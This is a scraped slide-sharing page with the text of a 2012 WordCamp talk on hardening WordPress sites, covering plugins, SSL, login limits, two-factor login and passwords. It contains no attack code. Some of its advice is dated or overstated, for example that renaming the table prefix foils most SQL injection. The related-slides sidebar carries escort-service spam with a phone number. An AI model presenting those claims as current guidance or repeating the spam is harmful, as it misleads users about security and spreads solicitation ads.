How To Improve WooCommerce Security? Complete Security Checklist for 2023
How To Improve WooCommerce Security? Complete Security Checklist for 2023How To Improve WooCommerce Security? Complete Security Checklist for 2023
How To Improve WooCommerce Security? Complete Security Checklist for 2023
 
Security, more important than ever!
Security, more important than ever!Security, more important than ever!
Security, more important than ever!
 

Último

How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
Clustering techniques data mining book ....
Clustering techniques data mining book ....Clustering techniques data mining book ....
Clustering techniques data mining book ....ShaimaaMohamedGalal
 

Último (20)

How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Exploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the ProcessExploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the Process
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Clustering techniques data mining book ....
Clustering techniques data mining book ....Clustering techniques data mining book ....
Clustering techniques data mining book ....
 

Securing Your WordPress Website - WordCamp Sydney 2012

  • 1. Securing Your WordPress Website Vladimir Lasky http://wpexpert.com.au/ WordCamp Sydney 2012 1
  • 2. What’s New In Today’s Talk? 1. The biggest security threats of 2012 and how to deal with them 2. An updated list of essential WordPress hardening steps for EVERY site 3. New WordPress management services that make your life easier 2
  • 3. Big Events in Internet Security This Year 1. Yahoo, LinkedIn, eHarmony all experienced security incidents that resulted in users’ passwords/hashes being published 2. Lots of exploits targeting code using vulnerable PHP libraries including TimThumb and Uploadify 3. Wi-Fi Protected Setup (WPS) vulnerability in Wireless Routers revealed in December 2011 3
  • 4. 4
  • 5. 5
  • 6. Lessons From Password Disclosure Incidents 1. You cannot assume any website will properly secure their databases. 2. Plenty of computational power exists for brute-force password cracking of password hashes – spare no effort to prevent these from being leaked. 3. People who reuse the same password across different sites are asking to get “p0wned” and become targets for identity theft. 4. Having a unique, secure password for every Internet account is mandatory. 6
  • 8. Lessons from WPS Vulnerability 1. The WPS exploit provides a backdoor to wireless routers secured with WPA2 2. Technologies that overcome security burdens often introduce security holes 3. Disable WPS in every Wi-Fi Router that you control. In some cases, this will require a firmware upgrade or possibly even replacing the router 8
  • 10. Lessons from PHP Exploits 1. Many programmers are lazy or ignorant of proper data validation practices 2. Obtaining plugins and themes from official sources reduces risk, but does not guaratee security 3. Application firewalls are a NECESSITY 10
  • 11. Essential Steps to Harden Your WP Installation 11
  • 12. Install WP Firewall 2 This plugin analyses HTTP requests and checks for suspicious parameters that indicate PHP or SQL injection attempts It will protect you against the majority of zero- day exploits Set the configuration option ‘Suppress similar attack warning emails’ to ‘On’, to prevent being deluged with identical warnings. 12
  • 13. Rename Your Admin Account 1. Use the plugin ‘Admin Renamer Extended’ to rename the ‘admin’ account to something unique. 2. From the WP Dashboard, go to Users->Your Profile. For the option set ‘Display Name Publicly as’, choose something that is not the same as your admin account name 13
  • 14. Change the Default MySQL Table Prefix 1. The WordPress default MySQL table prefix is ‘wp_’. 2. By renaming this to something else, ie. ‘tb132_’ we can foil the majority of blind SQL injection attempts 3. For an existing site, use the plugin “WordPress Table Rename” to make this easier. 14
  • 15. Prevent Plaintext Password Transmission – Best Option 1. Have your site hosted with a provider that supports HTTPS and provides either: – Their own Shared SSL Certificate – The ability to install your own – The ability to obtain one for you and install it (usually for a fee) 2. Install the plugin “WP HTTPS (SSL)” and enable the option “Force SSL Administration”. 3. This will prevent your password and session cookies from being sniffed (captured) over the Network 15
  • 16. Prevent Plaintext Password Transmission – Next Best 1. If you can’t use HTTPS, then install the plugin “Semisecure Login Reimagined”. 2. This uses Javascript to encrypt your password before sending it to the server 3. Make sure you logout from WordPress to prevent network eavedroppers from sniffing (capturing) and re-using your session key. 16
  • 17. Prevent Brute-Force Login Attempts Brute- Install one of the following plugins: 1. Login Security Solution – Slows down response time of your website after multiple failed attempts – Prevents users from choosing weak passwords and 2. Limit Login Attempts – Locks out accounts for a set time period after multiple failed attempts 17
  • 18. Install WP File Monitor Plus This plugin monitors files under your WP installation for changes. When a change is detected, it displays a dashboard alert and can also send an email As an administrator, you can view the list of changes and spot anything unexpected or unusual 18
  • 20. Regularly Update Your Site, Plugins and Themes The last talk stressed the importance of performing regular updates to WordPress, themes and plugins and performing regular remotely-initiated backups Several WordPress management services now exist to simply and speed up these steps: – ManageWP (hosted) – InfiniteWP (self-hosted) – WP Remote (hosted) – Worpit (hosted) 20
  • 21. Accessing Your Site From Untrusted PCs Two-Factor authentication is mandatory This is a combination of a password and a random number from a key fob, SMS message or a mobile phone app that you obtain each time you log in WordPress Two-Factor plugins include: 1. Second Factor 2. Google Authenticator 3. Duo Two-Factor Authentication 21
  • 22. Accessing Your Site From Untrusted Networks 1. If you can, use your smart phone or laptop PC equipped with 3G, 4G or GPRS Mobile Internet 2. If you are forced to use a public WiFi access point or LAN, ensure that any sites requiring authentication are accessed via their HTTPS (secure) link. 22
  • 23. Choosing a Password Twelve characters long as a minimum, but not a dictionary word Common number/letter substitutions provide little extra security – cracking tools almost always check for these 23
  • 24. Password Memorisation Techniques 1. Come up with a memorable sentence, and use the first letters of each word to form the password e.g. – “Jack and Jill went up the hill to fetch a pale of water” could form a 13-character password “JaJwuthtfapow” 2. Three unrelated unconnected dictionary words one after the other, misspelt a certain way known to you On your own trusted PC, consider using an encrypted password manager like KeePass 24
  • 25. Conclusion Slides from Previous Talk at Wordcamp GC 2011: – http://slidesha.re/tr2XA5 – Covers the “Three Pillars of Security”, the aims of attackers and other WordPress security plugins ManageWP - 30% discount on all plans for WordCamp Sydney Attendees: – http://managewp.com/wcsyd Questions and Comments: – http://wpexpert.com.au/contact-us/ 25